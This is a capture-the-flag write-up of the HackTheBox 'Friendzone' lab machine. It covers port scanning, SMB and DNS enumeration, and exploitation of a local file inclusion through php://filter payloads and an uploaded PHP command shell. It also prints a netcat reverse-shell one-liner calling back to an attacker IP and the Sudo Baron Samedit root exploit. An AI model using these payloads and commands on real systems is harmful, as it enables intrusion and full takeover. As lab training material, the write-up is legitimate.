HackTheBox - Friendzone Writeup

tags: writeup HackTheBox Machine Easy OSCP

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Port Scanning

# Nmap 7.92 scan initiated Mon Aug  8 06:53:23 2022 as: nmap -sV -T4 -sT -sC -v -oN nmap 10.10.10.123
Nmap scan report for 10.10.10.123
Host is up (0.041s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.29 (Ubuntu)
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Issuer: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-10-05T21:02:30
| Not valid after:  2018-11-04T21:02:30
| MD5:   c144 1868 5e8b 468d fc7d 888b 1123 781c
|_SHA-1: 88d2 e8ee 1c2c dbd3 ea55 2e5e cdd4 e94c 4c8b 9233
|_http-title: 404 Not Found
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -59m44s, deviation: 1h43m55s, median: 15s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   FRIENDZONE<00>       Flags: <unique><active>
|   FRIENDZONE<03>       Flags: <unique><active>
|   FRIENDZONE<20>       Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2022-08-08T13:54:00+03:00
| smb2-time: 
|   date: 2022-08-08T10:54:00
|_  start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug  8 06:53:53 2022 -- 1 IP address (1 host up) scanned in 30.16 seconds

We have the following services:

• Port 21: ftp server
• Port 22: ssh server
• Port 53: DNS server
• Port 80: HTTP Web Server
• Port 139: Samba Server
• Port 443: HTTPS Web Server
• Port 445: Netbios Samba

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Enumeration

First I look into the Samba share and i found some cred on it. Listing the shares with smbclient and the L flag we se some directories:

The General share has inside some credentials:

And we can upload files to Development share so maybe we can upload some reverse or some shell.

This will serve to us in the near future.

If we enter the web application at port 80 we see this:

Knowing we have a DNS server is good to enumerate very well the subdomains of it, normally like every machine of HTB will add the name of the machine appended to a dot htb, it will look like this:

sudo echo "10.10.10.123 friendzone.htb" >> /etc/hosts

But knowing theres a info email that gives to us the first domain we will add to the hosts file and after adding it we are gonna a try a zone transfer to obtain all the info about this domain using this command:

dig axfr [domain] @[ip]

Assuming that there is also something with the name of the site we will try to make queries to friendzone.red as well.

After this is time to enumerate that and start the explotation.

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Explotation

After enumerating a look we see the most interesting subdomain was:

administrator1.friendzone.red

It look like this:

Using the credentials obtained in the samba we can login.

admin:WORKWORKHhallelujah@#

It redirect us to dashboard.php

As we can see in the next image theres some parameter that we can use to load files in the web.

Iif we use default parameters like the web said we receive this response:

It smells like a lfi but if we change the timestamp to ../../../../../etc/passwd we aren't gonna receive any response.

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=../../../../../etc/passwd

It's time to search about LFI and some tricks. We want to see how main page is coded so it time to use PHP Filters like these:

php://filter/convert.base64-encode/resource=

This filter encode the page that we load with LFI in base64, that allow us to obtain the source code and see if there's some filter or something like that.

In this case I want to see the dashboard code so with the following URL we are going to be capable of see it.

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=dashboard

And if we decode it we can see that every file that we want to Include it appends a .php extension.

Knowing this maybe we can load some php file uploaded on the uploads web page or in the Writable Samba , after looking in the samba we can see were locates the files of the samba:

Assuming the share is in etc/files/ the writable Development folder will be in /etc/Development so its time to upload a cmd in php to the samba and try to Include on the web with the following url:

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/cmd&cmd=id

We can upload to the samba going to the directory of the php cmd and using put command inside the smbclient:

after that we use the URL and we can execute code from the URL:

view-source:https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/cmd&cmd=cat /etc/passwd

After probe that we have RCE it's time to receive a reverse shell. To do this we can use netcat pentest monkey reverse shell, and URL encode it using Burp to avoid problems with special characters. Before to search the following url we have to start a listener to receive the reverse.

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/cmd&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2%3E%261|nc+10.10.16.5+443+%3E/tmp/f

rlwrap nc -nlvp 443

After that we have to obtain user privileges:

⏫User Privesc

Going back one directory and looking inside the mysql_data.conf file we can found some credentials that will allow us to login with ssh into the machine as friend user.

After this it's time to search for a root privesc.

⏫Root Privesc

In this machine there are some ways to obtain root, first we are gonna start with linpeas script to enumerate the system.

After run it there are some probable exploits that will work, the first time I root the box I used the Sudo Baron Samedit exploit.

This CVE is exploitable by any local user (normal users and system users,
sudoers and non-sudoers), without authentication (i.e., the attacker
does not need to know the user's password) so we can obtain root privileges easily only we have to compile it and run it selecting the version, in this case the 1.

Exploit: https://github.com/blasty/CVE-2021-3156

As you can see on the github page run the following commands:

After executed the make comand we have to upload to the machine using the python web server:

python -m http.server 80

Execute this on the machine:

wget -r http://10.10.10.10/CVE-2021-3156

After that give execution privileges to the files inside the folder and execute the exploit with the number 1.

After that now we have root privileges and we can read the root flag! Also as I saw in other writeups after finishing the machine showing we can use Python Library Hijacking Technique to do the privesc using the os library because is writable, see this post to know how to do it and try this technique.

https://rastating.github.io/privilege-escalation-via-python-library-hijacking/

You can find me on: